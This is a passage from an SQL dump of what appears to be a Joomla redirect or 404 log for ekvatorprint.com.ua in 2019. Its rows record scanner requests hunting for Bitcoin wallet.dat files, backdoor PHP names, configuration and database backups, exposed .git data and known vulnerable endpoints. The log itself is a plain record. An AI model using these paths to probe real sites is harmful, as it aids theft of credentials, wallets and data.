00:00:00',301),(15375,'https://ekvatorprint.com.ua/bitcoin-core-0.12.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:45','0000-00-00 00:00:00',301),(15376,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.18.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:48','0000-00-00 00:00:00',301),(15377,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.15.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:51','0000-00-00 00:00:00',301),(15378,'https://ekvatorprint.com.ua/bitcoin-core-0.13.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:54','0000-00-00 00:00:00',301),(15379,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.17.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:58','0000-00-00 00:00:00',301),(15380,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.16.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:03','0000-00-00 00:00:00',301),(15381,'https://ekvatorprint.com.ua/bitcoin-core-0.11.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:06','0000-00-00 00:00:00',301),(15382,'https://ekvatorprint.com.ua/bitcoin-core-0.9.5/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:09','0000-00-00 00:00:00',301),(15383,'https://ekvatorprint.com.ua/bitcoin-core-0.14.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:12','0000-00-00 00:00:00',301),(15384,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.10.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:15','0000-00-00 00:00:00',301),(15385,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.16.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:18','0000-00-00 00:00:00',301),(15386,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.15.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:21','0000-00-00 00:00:00',301),(15387,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.10.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:24','0000-00-00 00:00:00',301),(15388,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.15.0.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:27','0000-00-00 00:00:00',301),(15389,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.11.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:30','0000-00-00 00:00:00',301),(15390,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.15.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:33','0000-00-00 00:00:00',301),(15391,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.10.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:37','0000-00-00 00:00:00',301),(15392,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.14.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:39','0000-00-00 00:00:00',301),(15393,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.16.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:42','0000-00-00 00:00:00',301),(15394,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.10.4/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:46','0000-00-00 00:00:00',301),(15395,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.17.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:48','0000-00-00 00:00:00',301),(15396,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.12.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:51','0000-00-00 00:00:00',301),(15397,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.15.0.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:54','0000-00-00 00:00:00',301),(15398,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.15.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:15:58','0000-00-00 00:00:00',301),(15399,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.14.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:04','0000-00-00 00:00:00',301),(15400,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.15.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:07','0000-00-00 00:00:00',301),(15401,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.10.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:10','0000-00-00 00:00:00',301),(15402,'https://ekvatorprint.com.ua/bitcoin-core-0.18.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:12','0000-00-00 00:00:00',301),(15403,'https://ekvatorprint.com.ua/bitcoin-core-0.13.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:16','0000-00-00 00:00:00',301),(15404,'https://ekvatorprint.com.ua/bitcoin-core-0.14.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:19','0000-00-00 00:00:00',301),(15405,'https://ekvatorprint.com.ua/bitcoin-core-0.14.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:22','0000-00-00 00:00:00',301),(15406,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.11.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:25','0000-00-00 00:00:00',301),(15407,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.17.0.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:30','0000-00-00 00:00:00',301),(15408,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.14.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:33','0000-00-00 00:00:00',301),(15409,'https://ekvatorprint.com.ua/bitcoin-core-0.15.0.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:37','0000-00-00 00:00:00',301),(15410,'https://ekvatorprint.com.ua/bitcoin-core-0.13.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:41','0000-00-00 00:00:00',301),(15411,'https://ekvatorprint.com.ua/bitcoin-core-0.17.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:43','0000-00-00 00:00:00',301),(15412,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.12.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:48','0000-00-00 00:00:00',301),(15413,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.14.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:53','0000-00-00 00:00:00',301),(15414,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.14.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:16:56','0000-00-00 00:00:00',301),(15415,'https://ekvatorprint.com.ua/bitcoin-core-0.15.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:17:04','0000-00-00 00:00:00',301),(15416,'https://ekvatorprint.com.ua/bitcoin-core-0.11.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:17:06','0000-00-00 00:00:00',301),(15417,'https://ekvatorprint.com.ua/wordpress/wp-admin/',NULL,'','',1,0,'2019-08-18 02:05:18','0000-00-00 00:00:00',301),(15418,'https://ekvatorprint.com.ua/update.php',NULL,'','',5,0,'2019-08-19 03:32:06','0000-00-00 00:00:00',301),(15419,'https://ekvatorprint.com.ua/administrator/content-comments.min.php?good=1',NULL,'','',2,0,'2019-08-22 07:25:17','0000-00-00 00:00:00',301),(15420,'http://ekvatorprint.com.ua/chrome-extension://ieebiigcdadickkkcgbjbgggibmfcoah/css/add_style.css?id=0.8470387319329926',NULL,'','',1,0,'2019-08-22 21:54:49','0000-00-00 00:00:00',301),(15421,'http://ekvatorprint.com.ua/chrome-extension://ieebiigcdadickkkcgbjbgggibmfcoah/css/add_style.css?id=0.5188902872420487',NULL,'','',1,0,'2019-08-22 22:00:41','0000-00-00 00:00:00',301),(15422,'http://ekvatorprint.com.ua/chrome-extension://ieebiigcdadickkkcgbjbgggibmfcoah/css/add_style.css?id=0.5092737992830658',NULL,'','',1,0,'2019-08-22 22:01:15','0000-00-00 00:00:00',301),(15423,'http://ekvatorprint.com.ua/chrome-extension://ieebiigcdadickkkcgbjbgggibmfcoah/css/add_style.css?id=0.008499565186468105',NULL,'','',1,0,'2019-08-22 22:03:31','0000-00-00 00:00:00',301),(15424,'https://ekvatorprint.com.ua/ghfhvvaw.php',NULL,'','',4,0,'2019-08-23 22:21:27','0000-00-00 00:00:00',301),(15425,'https://ekvatorprint.com.ua/missok.php?x=1',NULL,'','',3,0,'2019-08-24 04:32:20','0000-00-00 00:00:00',301),(15426,'https://ekvatorprint.com.ua/administrator/includes/readmy.php',NULL,'','',2,0,'2019-08-24 09:58:10','0000-00-00 00:00:00',301),(15427,'https://ekvatorprint.com.ua/trackback.php',NULL,'','',3,0,'2019-08-24 11:29:59','0000-00-00 00:00:00',301),(15428,'https://ekvatorprint.com.ua/xattacker.php?x=attacker',NULL,'','',3,0,'2019-08-24 17:46:21','0000-00-00 00:00:00',301),(15429,'https://ekvatorprint.com.ua/modulnye_kartiny',NULL,'','',1,0,'2019-08-24 17:46:49','0000-00-00 00:00:00',301),(15430,'https://ekvatorprint.com.ua/consystem.php',NULL,'','',3,0,'2019-08-25 06:21:41','0000-00-00 00:00:00',301),(15431,'https://ekvatorprint.com.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','',13,0,'2019-08-25 08:05:14','0000-00-00 00:00:00',301),(15432,'https://ekvatorprint.com.ua/eigk4juesxn7pjsqehx7tftuxr',NULL,'','',1,0,'2019-08-25 11:22:52','0000-00-00 00:00:00',301),(15433,'https://ekvatorprint.com.ua/cart.json',NULL,'','',4,0,'2019-08-25 21:42:54','0000-00-00 00:00:00',301),(15434,'https://ekvatorprint.com.ua/wp-cokd.php',NULL,'','',3,0,'2019-08-26 01:01:20','0000-00-00 00:00:00',301),(15435,'https://ekvatorprint.com.ua/sizing.php',NULL,'','',2,0,'2019-08-26 07:22:07','0000-00-00 00:00:00',301),(15436,'https://ekvatorprint.com.ua/unz.php',NULL,'','',3,0,'2019-08-26 13:41:24','0000-00-00 00:00:00',301),(15437,'https://ekvatorprint.com.ua/index.php?view=article&id=1:2010-11-06-15-56-21&format=pdf&option=com_content',NULL,'','',2,0,'2019-08-26 14:40:20','0000-00-00 00:00:00',301),(15438,'https://ekvatorprint.com.ua/tong.php?login=kmufg',NULL,'','',2,0,'2019-08-26 20:13:10','0000-00-00 00:00:00',301),(15439,'https://ekvatorprint.com.ua/wp-includse.php?script=1',NULL,'','',3,0,'2019-08-27 08:47:41','0000-00-00 00:00:00',301),(15440,'https://ekvatorprint.com.ua/cde42170f4f5b29105ed3977c1f5f4d1.php',NULL,'http://ekvatorprint.com.ua/cde42170f4f5b29105ed3977c1f5f4d1.php','',4,0,'2019-08-27 14:17:05','0000-00-00 00:00:00',301),(15441,'https://ekvatorprint.com.ua/configurationbak.php',NULL,'','',8,0,'2019-08-27 21:41:19','0000-00-00 00:00:00',301),(15442,'https://ekvatorprint.com.ua/.git/info/refs?service=git-upload-pack',NULL,'','',1,0,'2019-08-27 21:54:06','0000-00-00 00:00:00',301),(15443,'https://ekvatorprint.com.ua/include.php',NULL,'http://ekvatorprint.com.ua/include.php','',5,0,'2019-08-28 02:15:26','0000-00-00 00:00:00',301),(15444,'https://ekvatorprint.com.ua/footer.php',NULL,'http://ekvatorprint.com.ua/footer.php','',14,0,'2019-08-29 02:22:37','0000-00-00 00:00:00',301),(15445,'https://ekvatorprint.com.ua/component/content/frontpage',NULL,'','',2,0,'2019-08-29 04:24:12','0000-00-00 00:00:00',301),(15446,'https://ekvatorprint.com.ua/xml.php',NULL,'','',11,0,'2019-08-29 07:49:48','0000-00-00 00:00:00',301),(15447,'https://ekvatorprint.com.ua/search.php',NULL,'','',9,0,'2019-08-29 15:32:28','0000-00-00 00:00:00',301),(15448,'https://ekvatorprint.com.ua/?view=article&id=1%3a2010-11-06-15-56-21&format=pdf&option=com_content',NULL,'','',2,0,'2019-08-30 10:46:06','0000-00-00 00:00:00',301),(15449,'https://ekvatorprint.com.ua/tmpe.php',NULL,'','',3,0,'2019-08-30 13:34:42','0000-00-00 00:00:00',301),(15450,'https://ekvatorprint.com.ua/hivcxa.php',NULL,'','',4,0,'2019-08-31 03:36:57','0000-00-00 00:00:00',301),(15451,'https://ekvatorprint.com.ua/libraries/modules.php',NULL,'','',4,0,'2019-08-31 16:36:20','0000-00-00 00:00:00',301),(15452,'https://ekvatorprint.com.ua/modules/modules.php',NULL,'','',5,0,'2019-09-01 00:31:05','0000-00-00 00:00:00',301),(15453,'https://ekvatorprint.com.ua/wp-tmp.php',NULL,'','',3,0,'2019-09-01 02:14:55','0000-00-00 00:00:00',301),(15454,'https://ekvatorprint.com.ua/wp-load-5b7a23c0744615b7a23c0744af.php',NULL,'','',3,0,'2019-09-02 06:12:49','0000-00-00 00:00:00',301),(15455,'https://ekvatorprint.com.ua/tayymqwn0taqg',NULL,'','',1,0,'2019-09-02 06:14:32','0000-00-00 00:00:00',301),(15456,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/css.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/css.php','',1,0,'2019-09-03 05:52:00','0000-00-00 00:00:00',301),(15457,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/op.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/op.php','',1,0,'2019-09-03 05:52:02','0000-00-00 00:00:00',301),(15458,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/xxx.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/xxx.php','',1,0,'2019-09-03 05:52:02','0000-00-00 00:00:00',301),(15459,'https://ekvatorprint.com.ua/smalls.php',NULL,'','',4,0,'2019-09-03 06:00:41','0000-00-00 00:00:00',301),(15460,'http://ekvatorprint.com.ua/plotternaya-podrezka/templates/gk_ilife/favicon.ico',NULL,'','',2,0,'2019-09-03 06:01:16','0000-00-00 00:00:00',301),(15461,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/composer.json',NULL,'','',7,0,'2019-09-04 11:04:10','0000-00-00 00:00:00',301),(15462,'https://ekvatorprint.com.ua/repair.php',NULL,'http://ekvatorprint.com.ua/repair.php','',4,0,'2019-09-04 11:52:09','0000-00-00 00:00:00',301),(15463,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/b3.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/b3.php','',1,0,'2019-09-04 11:52:09','0000-00-00 00:00:00',301),(15464,'https://ekvatorprint.com.ua/imdex.php',NULL,'','',3,0,'2019-09-05 16:33:54','0000-00-00 00:00:00',301),(15465,'https://ekvatorprint.com.ua/db_z.php',NULL,'','',2,0,'2019-09-06 00:26:35','0000-00-00 00:00:00',301),(15466,'https://ekvatorprint.com.ua/blog',NULL,'https://ekvatorprint.com.ua/blog','',15,0,'2019-09-06 13:38:58','0000-00-00 00:00:00',301),(15467,'https://ekvatorprint.com.ua/wp',NULL,'https://ekvatorprint.com.ua/wp','',46,0,'2019-09-06 13:39:13','0000-00-00 00:00:00',301),(15468,'https://ekvatorprint.com.ua/wordpress',NULL,'https://ekvatorprint.com.ua/wordpress','',46,0,'2019-09-06 13:39:27','0000-00-00 00:00:00',301),(15469,'http://ekvatorprint.com.ua/printing-on-the-grid/templates/gk_ilife/favicon.ico',NULL,'','',2,0,'2019-09-07 10:47:06','0000-00-00 00:00:00',301),(15470,'https://ekvatorprint.com.ua/functions.php',NULL,'','',2,0,'2019-09-07 20:17:13','0000-00-00 00:00:00',301),(15471,'http://ekvatorprint.com.ua/images/style2/bg.jpg',NULL,'https://ekvatorprint.com.ua/print-great-photos','',19,0,'2019-09-08 10:14:13','0000-00-00 00:00:00',301),(15472,'http://ekvatorprint.com.ua/images/style2/header_bg.png',NULL,'https://ekvatorprint.com.ua/print-great-photos','',19,0,'2019-09-08 10:14:13','0000-00-00 00:00:00',301),(15473,'http://ekvatorprint.com.ua/images/dop_menu_list_style.png',NULL,'https://ekvatorprint.com.ua/print-great-photos','',19,0,'2019-09-08 10:14:14','0000-00-00 00:00:00',301),(15474,'http://ekvatorprint.com.ua/images/style2/ab.png',NULL,'https://ekvatorprint.com.ua/print-great-photos','',19,0,'2019-09-08 10:14:14','0000-00-00 00:00:00',301),(15475,'http://ekvatorprint.com.ua/images/style2/menu_bg.png',NULL,'https://ekvatorprint.com.ua/print-great-photos','',19,0,'2019-09-08 10:14:14','0000-00-00 00:00:00',301),(15476,'http://ekvatorprint.com.ua/images/style2/logo.png',NULL,'https://ekvatorprint.com.ua/print-great-photos','',19,0,'2019-09-08 10:14:14','0000-00-00 00:00:00',301),(15477,'https://ekvatorprint.com.ua/error-logs.php',NULL,'','',3,0,'2019-09-08 11:11:19','0000-00-00 00:00:00',301),(15478,'https://ekvatorprint.com.ua/iontrol.php',NULL,'','',3,0,'2019-09-08 19:02:10','0000-00-00 00:00:00',301),(15479,'https://ekvatorprint.com.ua/sqlibak.php',NULL,'','',2,0,'2019-09-10 01:16:33','0000-00-00 00:00:00',301),(15480,'https://ekvatorprint.com.ua/administrator/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2019-09-10 08:37:03','0000-00-00 00:00:00',301),(15481,'https://ekvatorprint.com.ua/bak.php?login=canshu?',NULL,'','',2,0,'2019-09-10 09:15:43','0000-00-00 00:00:00',301),(15482,'https://ekvatorprint.com.ua/old/wp-admin/install.php?step=1',NULL,'','',1,0,'2019-09-10 14:37:47','0000-00-00 00:00:00',301),(15483,'https://ekvatorprint.com.ua/test/wp-admin/install.php?step=1',NULL,'','',1,0,'2019-09-10 14:37:47','0000-00-00 00:00:00',301),(15484,'https://ekvatorprint.com.ua/wp-admin/setup-config.php',NULL,'','',14,0,'2019-09-10 14:37:49','0000-00-00 00:00:00',301),(15485,'https://ekvatorprint.com.ua/old/wp-admin/setup-config.php',NULL,'','',2,0,'2019-09-10 14:37:49','0000-00-00 00:00:00',301),(15486,'https://ekvatorprint.com.ua/wordpress/wp-admin/setup-config.php',NULL,'','',7,0,'2019-09-10 14:37:49','0000-00-00 00:00:00',301),(15487,'https://ekvatorprint.com.ua/test/wp-admin/setup-config.php',NULL,'','',3,0,'2019-09-10 14:37:50','0000-00-00 00:00:00',301),(15488,'https://ekvatorprint.com.ua/wp/wp-admin/setup-config.php',NULL,'','',4,0,'2019-09-10 14:37:50','0000-00-00 00:00:00',301),(15489,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/license',NULL,'','',14,0,'2019-09-10 14:37:50','0000-00-00 00:00:00',301),(15490,'https://ekvatorprint.com.ua/api/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-10 14:37:51','0000-00-00 00:00:00',301),(15491,'https://ekvatorprint.com.ua/laravel/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2019-09-10 14:37:51','0000-00-00 00:00:00',301),(15492,'https://ekvatorprint.com.ua/j8e8ggbk2sz926frp3ltbtub',NULL,'','',1,0,'2019-09-11 01:14:01','0000-00-00 00:00:00',301),(15493,'https://ekvatorprint.com.ua/images/modulnie',NULL,'','',4,0,'2019-09-18 19:01:11','0000-00-00 00:00:00',301),(15494,'https://ekvatorprint.com.ua/bitrix/admin/',NULL,'http://www.ekvatorprint.com.ua/bitrix/admin/','',3,0,'2019-09-18 21:39:34','0000-00-00 00:00:00',301),(15495,'https://ekvatorprint.com.ua/h8f1m5knzpra5u1cl',NULL,'','',1,0,'2019-09-19 11:22:50','0000-00-00 00:00:00',301),(15496,'https://ekvatorprint.com.ua/2019/wp-login.php',NULL,'http://ekvatorprint.com.ua/2019/wp-login.php','',3,0,'2019-09-21 01:24:04','0000-00-00 00:00:00',301),(15497,'https://ekvatorprint.com.ua/download.php?file=configuration.php',NULL,'','',1,0,'2019-09-21 17:59:36','0000-00-00 00:00:00',301),(15498,'http://ekvatorprint.com.ua/price/templates/gk_ilife/favicon.ico',NULL,'','',3,0,'2019-09-23 20:20:49','0000-00-00 00:00:00',301),(15499,'http://ekvatorprint.com.ua/printing-on-an-awning/templates/gk_ilife/favicon.ico',NULL,'','',1,0,'2019-09-23 20:21:16','0000-00-00 00:00:00',301),(15500,'https://ekvatorprint.com.ua/adminer/',NULL,'','',1,0,'2019-09-23 21:03:39','0000-00-00 00:00:00',301),(15501,'https://ekvatorprint.com.ua/delivery:',NULL,'','',1,0,'2019-09-24 15:43:51','0000-00-00 00:00:00',301),(15502,'https://ekvatorprint.com.ua/backup/wp-login.php',NULL,'http://ekvatorprint.com.ua/backup/wp-login.php','',8,0,'2019-09-25 21:03:28','0000-00-00 00:00:00',301),(15503,'https://ekvatorprint.com.ua/website/wp-login.php',NULL,'http://ekvatorprint.com.ua/website/wp-login.php','',1,0,'2019-09-26 15:23:11','0000-00-00 00:00:00',301),(15504,'https://ekvatorprint.com.ua/forum/index.php?routestring=ajax/render/widget_php',NULL,'','',2,0,'2019-09-26 21:49:24','0000-00-00 00:00:00',301),(15505,'https://ekvatorprint.com.ua/zsjz4c1w9pwmbs',NULL,'','',1,0,'2019-09-27 00:05:12','0000-00-00 00:00:00',301),(15506,'https://ekvatorprint.com.ua/configuration.php.bak',NULL,'','',9,0,'2019-09-28 12:27:20','0000-00-00 00:00:00',301),(15507,'https://ekvatorprint.com.ua/configuration.php~',NULL,'','',3,0,'2019-09-28 13:37:40','0000-00-00 00:00:00',301),(15508,'https://ekvatorprint.com.ua/forum/',NULL,'','',5,0,'2019-09-28 20:08:40','0000-00-00 00:00:00',301),(15509,'https://ekvatorprint.com.ua/forums/',NULL,'','',3,0,'2019-09-28 20:08:44','0000-00-00 00:00:00',301),(15510,'https://ekvatorprint.com.ua/vb/',NULL,'','',2,0,'2019-09-28 20:08:50','0000-00-00 00:00:00',301),(15511,'https://ekvatorprint.com.ua/vbulletin/',NULL,'','',2,0,'2019-09-28 20:08:56','0000-00-00 00:00:00',301),(15512,'https://ekvatorprint.com.ua/vb5/',NULL,'','',1,0,'2019-09-28 20:09:01','0000-00-00 00:00:00',301),(15513,'https://ekvatorprint.com.ua/vbulletin5/',NULL,'','',1,0,'2019-09-28 20:09:07','0000-00-00 00:00:00',301),(15514,'https://ekvatorprint.com.ua/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1',NULL,'','',2,0,'2019-10-03 04:27:13','0000-00-00 00:00:00',301),(15515,'https://ekvatorprint.com.ua/index.php?option=com_jssupportticket',NULL,'','',2,0,'2019-10-03 04:27:28','0000-00-00 00:00:00',301),(15516,'http://ekvatorprint.com.ua/forums/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:30:46','0000-00-00 00:00:00',301),(15517,'http://ekvatorprint.com.ua/vbforum/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:32:24','0000-00-00 00:00:00',301),(15518,'http://ekvatorprint.com.ua/vb/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:32:25','0000-00-00 00:00:00',301),(15519,'http://ekvatorprint.com.ua/vb5/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:33:25','0000-00-00 00:00:00',301),(15520,'http://ekvatorprint.com.ua/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:34:44','0000-00-00 00:00:00',301),(15521,'http://ekvatorprint.com.ua/vbulletin/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:34:56','0000-00-00 00:00:00',301),(15522,'http://ekvatorprint.com.ua/forum/js/ajax.js',NULL,'ekvatorprint.com.ua','',1,0,'2019-10-03 06:36:06','0000-00-00 00:00:00',301),(15523,'http://ekvatorprint.com.ua/www.google.com/humans.txt?/',NULL,'https://ekvatorprint.com.ua/www.google.com/humans.txt?/','',1,0,'2019-10-03 18:08:55','0000-00-00 00:00:00',301),(15524,'https://ekvatorprint.com.ua/y5bqks4fehbuixwns',NULL,'','',1,0,'2019-10-05 17:56:35','0000-00-00 00:00:00',301),(15525,'https://ekvatorprint.com.ua/_db_.sql',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 02:20:49','0000-00-00 00:00:00',301),(15526,'https://ekvatorprint.com.ua/_db_.sql.zip',NULL,'https://ekvatorprint.com.ua/','',2,0,'2019-10-10 03:03:56','0000-00-00 00:00:00',301),(15527,'https://ekvatorprint.com.ua/_db_.tar.gz',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-10-10 03:46:39','0000-00-00 00:00:00',301),(15528,'https://ekvatorprint.com.ua/ekvatorprint.7z',NULL,'https://ekvatorprint.com.ua/','',7,0,'2019-10-10 04:29:38','0000-00-00 00:00:00',301),(15529,'https://ekvatorprint.com.ua/ekvatorprint.bak',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 05:12:38','0000-00-00 00:00:00',301),(15530,'https://ekvatorprint.com.ua/ekvatorprint.bak.sql',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 05:55:21','0000-00-00 00:00:00',301),(15531,'https://ekvatorprint.com.ua/ekvatorprint.bck',NULL,'https://ekvatorprint.com.ua/','',2,0,'2019-10-10 06:39:51','0000-00-00 00:00:00',301),(15532,'https://ekvatorprint.com.ua/ekvatorprint.bck.sql',NULL,'https://ekvatorprint.com.ua/','',4,0,'2019-10-10 07:24:04','0000-00-00 00:00:00',301),(15533,'https://ekvatorprint.com.ua/ekvatorprint.rar',NULL,'https://ekvatorprint.com.ua/','',7,0,'2019-10-10 08:50:23','0000-00-00 00:00:00',301),(15534,'https://ekvatorprint.com.ua/ekvatorprint.tar.gz',NULL,'https://ekvatorprint.com.ua/','',7,0,'2019-10-10 12:20:25','0000-00-00 00:00:00',301),(15535,'https://ekvatorprint.com.ua/ekvatorprint.tgz',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-10 13:02:38','0000-00-00 00:00:00',301),(15536,'https://ekvatorprint.com.ua/ekvatorprint_backup.7z',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 14:30:49','0000-00-00 00:00:00',301),(15537,'https://ekvatorprint.com.ua/ekvatorprint_backup.rar',NULL,'https://ekvatorprint.com.ua/','',4,0,'2019-10-10 15:15:05','0000-00-00 00:00:00',301),(15538,'https://ekvatorprint.com.ua/ekvatorprint_backup.sql',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-10 15:58:48','0000-00-00 00:00:00',301),(15539,'https://ekvatorprint.com.ua/ekvatorprint_backup.sql.gz',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-10 16:42:09','0000-00-00 00:00:00',301),(15540,'https://ekvatorprint.com.ua/ekvatorprint_backup.sql.tar',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 17:25:44','0000-00-00 00:00:00',301),(15541,'https://ekvatorprint.com.ua/ekvatorprint_backup.tar',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-10 18:09:29','0000-00-00 00:00:00',301),(15542,'https://ekvatorprint.com.ua/ekvatorprint_backup.tar.gz',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 18:52:52','0000-00-00 00:00:00',301),(15543,'https://ekvatorprint.com.ua/ekvatorprint_backup.zip',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-10-10 19:36:39','0000-00-00 00:00:00',301),(15544,'https://ekvatorprint.com.ua/ekvatorprint_database.7z',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 20:20:09','0000-00-00 00:00:00',301),(15545,'https://ekvatorprint.com.ua/ekvatorprint_database.rar',NULL,'https://ekvatorprint.com.ua/','',7,0,'2019-10-10 21:04:03','0000-00-00 00:00:00',301),(15546,'https://ekvatorprint.com.ua/ekvatorprint_database.sql',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-10 21:47:41','0000-00-00 00:00:00',301),(15547,'https://ekvatorprint.com.ua/ekvatorprint_database.sql.gz',NULL,'https://ekvatorprint.com.ua/','',4,0,'2019-10-10 22:30:57','0000-00-00 00:00:00',301),(15548,'https://ekvatorprint.com.ua/ekvatorprint_database.sql.tar',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-10 23:14:14','0000-00-00 00:00:00',301),(15549,'https://ekvatorprint.com.ua/ekvatorprint_database.tar',NULL,'https://ekvatorprint.com.ua/','',6,0,'2019-10-10 23:57:20','0000-00-00 00:00:00',301),(15550,'https://ekvatorprint.com.ua/ekvatorprint_database.tar.gz',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-10-11 00:40:19','0000-00-00 00:00:00',301),(15551,'https://ekvatorprint.com.ua/ekvatorprint_database.zip',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-10-11 01:23:39','0000-00-00 00:00:00',301),(15552,'https://ekvatorprint.com.ua/ekvatorprint_db.7z',NULL,'https://ekvatorprint.com.ua/','',4,0,'2019-10-11 02:07:08','0000-00-00 00:00:00',301),(15553,'https://ekvatorprint.com.ua/ekvatorprint_db.rar',NULL,'https://ekvatorprint.com.ua/','',9,0,'2019-10-11 02:49:26','0000-00-00 00:00:00',301),(15554,'https://ekvatorprint.com.ua/ekvatorprint_db.sql',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-11 03:30:56','0000-00-00 00:00:00',301),(15555,'https://ekvatorprint.com.ua/ekvatorprint_db.sql.gz',NULL,'https://ekvatorprint.com.ua/','',5,0,'2019-10-11 04:12:59','0000-00-00 